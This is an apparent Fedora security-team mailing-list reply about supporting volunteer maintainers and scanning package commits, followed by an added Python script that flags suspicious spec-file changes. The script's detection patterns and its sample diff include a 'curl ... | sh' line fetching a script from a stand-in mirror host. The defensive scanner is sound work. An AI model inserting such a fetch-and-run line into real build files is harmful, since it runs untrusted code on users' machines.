On 08/10/2018 04:41 PM, Huzaifa Sidhpurwala wrote:
We also discussed sharing stats about maintainers who don't patch
security issues (some sort of public shaming).
After some thought I'm still not a big fan of the public shaming
approach. There are a lot of non-Red Hat employees who are doing package
maintenance on a voluntary basis. Putting community members on display
for not doing something for whatever reason will send the wrong signal.
We want their support. Thus we should try to establish ways to support
them.
3. Scan commits for existing packages to ensure no malicious code is
being introduced:
Have not quite figured this out yet, but it seems this is doable.
Adding additional checks should definitely be something that's
considered. This could become a close cooperation with the FPC because
it would be much easier if those guys are on our side.
Lastly, if anyone is not interested in continuing their contribution to
the security team, do let me know.
Well, I'm still in.
Kind regards,
Fabian
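Item 3 above (scanning commits to existing packages for newly introduced malicious code) is left open in the thread. As an added illustration of one possible starting point, and not code from this thread, from Fedora's tooling or from anyone quoted above, the script below walks a unified diff of a spec file and flags added lines that match a small, assumed set of heuristics: a download piped into a shell, inline base64 decoding, setuid bits being set, `eval`, and a `SourceN`/`PatchN` URL whose host changed from the removed line. The sample diff, the file name `example.spec` and the hosts in it are constructed for the example; the pattern list is an assumption, not a complete policy.

```python
import re
from urllib.parse import urlparse

# Assumed heuristics for added lines a reviewer would want a second look at.
# Illustrative only; a real scanner would carry a maintained rule set.
SUSPICIOUS = [
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"\bbase64\b.*(?:-d|--decode)\b"), "inline base64 decoding"),
    (re.compile(r"\bchmod\s+(?:[ug]\+s|[4-7]\d{3})\b"), "setuid/setgid bit being set"),
    (re.compile(r"\beval\b"), "eval of a constructed command"),
]

SOURCE_LINE = re.compile(r"^(Source\d*|Patch\d*)\s*:\s*(\S+)", re.IGNORECASE)
HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

# Constructed sample: a spec change that moves Source0 to another host and
# adds a network fetch piped into sh during %prep.
SAMPLE_DIFF = """\
diff --git a/example.spec b/example.spec
--- a/example.spec
+++ b/example.spec
@@ -1,7 +1,8 @@
 Name:    example
 Version: 1.2.3
-Source0: https://example.org/releases/example-%{version}.tar.gz
+Source0: https://cdn.example-mirror.net/example-%{version}.tar.gz
 %prep
 %setup -q
+curl -s https://cdn.example-mirror.net/setup.sh | sh
 %build
 %configure
"""


def scan_diff(diff_text):
    """Return (path, new_line_no, reason, added_line) for every flagged added line."""
    findings = []
    path = None
    new_line = 0
    removed_sources = {}  # tag (e.g. "source0") -> URL from a removed line
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].split("\t")[0]
            if path.startswith("b/"):
                path = path[2:]
            continue
        if raw.startswith("--- ") or raw.startswith("\\"):
            continue
        m = HUNK.match(raw)
        if m:
            # Hunk header gives the line number of the first line in the new file.
            new_line = int(m.group(1))
            continue
        if raw.startswith("-"):
            sm = SOURCE_LINE.match(raw[1:])
            if sm:
                removed_sources[sm.group(1).lower()] = sm.group(2)
            continue  # removed lines do not advance the new-file line counter
        if raw.startswith("+"):
            line = raw[1:]
            for pattern, why in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((path, new_line, why, line.strip()))
            sm = SOURCE_LINE.match(line)
            if sm:
                old = removed_sources.get(sm.group(1).lower())
                if old:
                    old_host = urlparse(old).netloc
                    new_host = urlparse(sm.group(2)).netloc
                    if old_host != new_host:
                        findings.append((path, new_line,
                                         f"{sm.group(1)} host changed from {old_host!r} to {new_host!r}",
                                         line.strip()))
        # Context lines and added lines both occupy a line in the new file.
        new_line += 1
    return findings


if __name__ == "__main__":
    for path, lineno, why, text in scan_diff(SAMPLE_DIFF):
        print(f"{path}:{lineno}: {why}: {text}")
```

Run against the sample, it reports the changed Source0 host at line 3 and the `curl ... | sh` at line 6. Host-change detection only fires when the same tag is both removed and added in the diff, so a brand-new `Source1` pointing somewhere unexpected would need a separate allow-list check of upstream hosts per package.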